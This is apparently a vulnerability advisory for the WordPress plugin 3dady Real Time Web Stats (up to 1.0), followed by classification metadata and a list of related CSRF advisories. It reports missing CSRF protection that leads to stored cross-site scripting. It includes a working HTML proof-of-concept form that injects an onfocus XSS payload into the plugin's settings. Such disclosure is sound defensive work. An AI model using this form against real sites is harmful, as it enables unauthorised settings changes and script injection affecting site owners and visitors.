3dady Real Time Web Stats <= 1.0 – Stored Cross-Site Scripting via CSRF | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. Furthermore, due to the lack of escaping, it could also lead to Stored Cross-Site Scripting issue

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin.php?page=3dady" method="POST">
    <input type="text" name="dady_submit_hidden" value="Y">
    <input type="text" name="dady_input_text" value='" autofocus onfocus=alert(/XSS/)>'>
    <input type="text" name="mth_submit_hidden" value="Y">
    <input type="text" name="dady2_input_text" value='XSS2'>
    <input type="submit" name="submit" value="Save+Changes">
</form>

Affects Plugins

3dady-real-time-web-stats

No known fix

References

URL

https://packetstormsecurity.com/files/#168480/

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

UnD3sc0n0c1d0

Verified

Yes

WPVDB ID

36ee3733-28b3-48dd-ba1e-08b7bbe2fe2d

Timeline

Publicly Published

2022-09-23 (about 3 years ago)

Added

2022-09-27 (about 3 years ago)

Last Updated

2022-09-27 (about 3 years ago)

Other

Published

Title

Published

2026-03-06

Title

Font Pairing Preview For Landing Pages <= 1.3 - Cross-Site Request Forgery to Settings Update

Published

2015-02-11

Title

WPBook <= 3.7 - Cross-Site Request Forgery (CSRF)

Published

2025-08-23

Title

百度分享按钮 <= 1.0.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-12-27

Title

GPT3 AI Content Writer < 1.8.13 - Cross-Site Request Forgery

Published

2014-09-17

Title

WP RSS Multi Importer < 3.14 - Cross Site Request Forgery (CSRF)